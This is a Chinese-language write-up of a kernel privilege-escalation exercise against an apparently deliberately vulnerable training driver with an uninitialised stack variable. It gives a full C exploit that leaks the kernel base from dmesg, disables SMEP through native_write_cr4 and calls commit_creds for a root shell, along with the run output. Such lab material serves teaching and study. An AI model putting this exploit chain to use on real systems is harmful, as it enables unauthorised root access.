漏洞分析

总共两个驱动号,对应两个功能。

		case UNINITIALISED_STACK_ALLOC:
		{
			ret = copy_to_stack((char *)p_arg);
			break;
		}
		case UNINITIALISED_STACK_USE:
		{
			use_obj_args use_obj_arg;
			
			if(copy_from_user(&use_obj_arg, p_arg, sizeof(use_obj_args)))
				return -EINVAL;
			
			
			use_stack_obj(&use_obj_arg);
	
			break;
		}

其中第一个功能如下

// 布置内核栈: 能往内核栈上传入4096字节的数据
	noinline static int copy_to_stack(char __user *user_buff)
	{
		int ret;
		char buff[BUFF_SIZE];

		ret = copy_from_user(buff, user_buff, BUFF_SIZE);
		buff[BUFF_SIZE - 1] = 0;

		return ret;
	}

第二个功能如下

	noinline static void use_stack_obj(use_obj_args *use_obj_arg)
	{
		volatile stack_obj s_obj;

		if(use_obj_arg->option == 0)
		{
			s_obj.fn = uninitialised_callback;//就是打印字符串
			s_obj.fn_arg = use_obj_arg->fn_arg;
		}

		s_obj.fn(s_obj.fn_arg);		

	}

其中结构体如下

	typedef struct stack_obj 	//72byte
	{
		int do_callback;
		long fn_arg;
		void (*fn)(long);
		char buff[48];
	}stack_obj;

	typedef struct use_obj_args		//16byte
	{
		int option;
		long fn_arg;
	}use_obj_args;

漏洞分析

漏洞:只有(use_obj_arg->option == 0)时,才会初始化stack_obj对象。

利用:构造(use_obj_arg->option != 0),产生内核栈变量未初始化引用错误。本驱动其实简化了漏洞利用过程,因为可以直接利用驱动号UNINITIALISED_STACK_ALLOC来布置内核栈,不需要考虑用系统调用来布置。

完整代码

#define _GNU_SOURCE
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>

#ifndef _VULN_DRIVER_
	#define _VULN_DRIVER_
	#define DEVICE_NAME "vulnerable_device"
	#define IOCTL_NUM 0xFE
	#define DRIVER_TEST _IO (IOCTL_NUM,0)
	#define BUFFER_OVERFLOW _IOR (IOCTL_NUM,1,char *)
	#define NULL_POINTER_DEREF _IOR (IOCTL_NUM,2,unsigned long)
	#define ALLOC_UAF_OBJ _IO (IOCTL_NUM,3)
	#define USE_UAF_OBJ _IO (IOCTL_NUM,4)
	#define ALLOC_K_OBJ _IOR (IOCTL_NUM,5,unsigned long)
	#define FREE_UAF_OBJ _IO (IOCTL_NUM,6)
	#define ARBITRARY_RW_INIT _IOR(IOCTL_NUM,7, unsigned long)
	#define ARBITRARY_RW_REALLOC _IOR(IOCTL_NUM,8,unsigned long)
	#define ARBITRARY_RW_READ _IOWR(IOCTL_NUM,9,unsigned long)
	#define ARBITRARY_RW_SEEK _IOR(IOCTL_NUM,10,unsigned long)
	#define ARBITRARY_RW_WRITE _IOR(IOCTL_NUM,11,unsigned long)
	#define UNINITIALISED_STACK_ALLOC _IOR(IOCTL_NUM,12,unsigned long)
	#define UNINITIALISED_STACK_USE _IOR(IOCTL_NUM,13,unsigned long)
#endif

#define PATH "/dev/vulnerable_device"

// stack 对象
struct stack_obj
{
	int do_callback;
	size_t fn_arg;
	void (*fn)(long);
};
struct use_obj_args
{
	int option;
	size_t fn_arg;
};



void force_single_core()//让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shell
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(0,&mask);

	if (sched_setaffinity(0,sizeof(mask),&mask))
		printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");
	return;
}

void do_page_fault()
{
	struct use_obj_args use_obj =
	{
		.option=1,
		.fn_arg=1337,
	};
	int child_fd=open(PATH, O_RDWR);
	ioctl(child_fd, UNINITIALISED_STACK_USE, &use_obj);//写一个错误的指针,造成pagefault
	return ;
}


#define GREP_INFOLEAK "dmesg | grep SyS_ioctl+0x79 | awk '{print $3}' | cut -d '<' -f 2 | cut -d '>' -f 1 > /tmp/infoleak"
size_t get_info_leak()      //从dmesg读取打印信息,泄露kernel基址
{
	system(GREP_INFOLEAK);
	size_t addr=0;
	FILE *fd=fopen("/tmp/infoleak","r");
	fscanf(fd,"%lx",&addr);
	fclose(fd);
	return addr;
}

size_t prepare_kernel_cred_addr=0xa6ca0;
size_t commit_creds_addr=0xa68b0;
size_t native_write_cr4_addr=0x65a30;
size_t sys_ioctl_offset=0x22bc59;
size_t fake_cr4=0x407f0;

void get_root()
{
	char* (*pkc)(int) = prepare_kernel_cred_addr;
	void (*cc)(char*) = commit_creds_addr;
	(*cc)((*pkc)(0));
}

int main()
{
	force_single_core();                                // step 1: 只允许在单核上运行

	int fd = open("/dev/vulnerable_device", O_RDWR);        //打开设备
	if (fd<0){
		printf("[-] Open error!\n");
		return 0;
	}
	ioctl(fd,DRIVER_TEST,NULL);  //用于标识dmesg中字符串的开始

	pid_t pid=fork();
	if (pid==0){
		do_page_fault();                //构造 page_fault 泄露kernel地址。
		exit(0);
	}
	int status;
	wait(&status);    // 等子进程结束
	//sleep(10);
	printf("[+] Begin to leak address by dmesg![+]\n");
	size_t kernel_base = get_info_leak()-sys_ioctl_offset;          //从dmesg读取后写到/tmp/infoleak,再读出来
	printf("[+] Kernel base addr : %p [+] \n", kernel_base);

	native_write_cr4_addr+=kernel_base;
	prepare_kernel_cred_addr+=kernel_base;
	commit_creds_addr+=kernel_base;
	printf("[+] We can get 3 important function address ![+]\n");
	printf("        native_write_cr4_addr = %p\n",native_write_cr4_addr);
	printf("        prepare_kernel_cred_addr = %p\n",prepare_kernel_cred_addr);
	printf("        commit_creds_addr = %p\n",commit_creds_addr);

	// step 3: 关闭smep
	char buf[4096];
	memset(buf, 0, sizeof(buf));
	struct use_obj_args use_obj={
		.option=1,
		.fn_arg=1337,
	};


    //利用UNINITIALISED_STACK_ALLOC功能在内核栈上布置目标函数和所需参数,这样在发生栈变量未初始化使用时就会触发执行目标函数。
    
	for (int i=0; i<4096; i+=16)
	{
		memcpy(buf+i, &fake_cr4, 8);   // 注意是fake_cr4所在地址
		memcpy(buf+i+8, &native_write_cr4_addr, 8);  // 注意是native_write_cr4_addr所在地址
	}
	ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);       //布置目标函数和所需参数
	ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);    //触发

	// step 4: 提权,执行get_root();  注意是把get_root()的地址拷贝过去,转一次
	size_t get_root_addr = &get_root;
	memset(buf, 0, sizeof(buf));
	for (int i=0; i<4096; i+=8)
		memcpy(buf+i, &get_root_addr, 8);

	ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);       //布置目标函数和所需参数
	ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);    //触发

	if (getuid()==0)
	{
		printf("[+] Congratulations! You get root shell !!! [+]\n");
		system("/bin/sh");
	}

	close(fd);
	return 0;
}
/*
use_stack_obj()
UNINITIALISED_STACK_USE=0x8008fe0d
.text:0000000000000023                 mov     rax, [rbp-38h]
.text:0000000000000027                 mov     use_obj_arg, [rbp-40h]
.text:000000000000002B                 call    __x86_indirect_thunk_rax

$ cat /sys/module/vuln_driver/sections/.text

*/

运行结果

...
...
[    8.136079] Call Trace:
[    8.136079]  [<ffffffffc0000030>] ? use_stack_obj+0x30/0x40 [vuln_driver]
[    8.136079]  [<ffffffff812363c3>] ? __fd_install+0x33/0xe0
[    8.136079]  [<ffffffffc00002dd>] do_ioctl+0x19d/0x4c0 [vuln_driver]
[    8.136079]  [<ffffffff8122b9e4>] do_vfs_ioctl+0x2a4/0x4a0
[    8.136079]  [<ffffffff812276c4>] ? putname+0x54/0x60
[    8.136079]  [<ffffffff8121723f>] ? do_sys_open+0x1af/0x230
[    8.136079]  [<ffffffff8122bc59>] SyS_ioctl+0x79/0x90
[    8.136079]  [<ffffffff8183b1e5>] entry_SYSCALL_64_fastpath+0x22/0x99
[    8.136079] Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b3 09 00 88 ff ff 55 60 4b 00 00 00 00 00 00  
[    8.136079] RIP  [<ffff880009b3001c>] 0xffff880009b3001c
[    8.136079]  RSP <ffff880009b6be20>
[    8.136079] CR2: ffff880009b3001c
[    8.136079] ---[ end trace 2c9188493a04a4d2 ]---
[+] Begin to leak address by dmesg![+]
[+] Kernel base addr : 0xffffffff81000000 [+] 
[+] We can get 3 important function address ![+]
        native_write_cr4_addr = 0xffffffff81065a30
        prepare_kernel_cred_addr = 0xffffffff810a6ca0
        commit_creds_addr = 0xffffffff810a68b0
[+] Congratulations! You get root shell !!! [+]
/ # id
uid=0 gid=0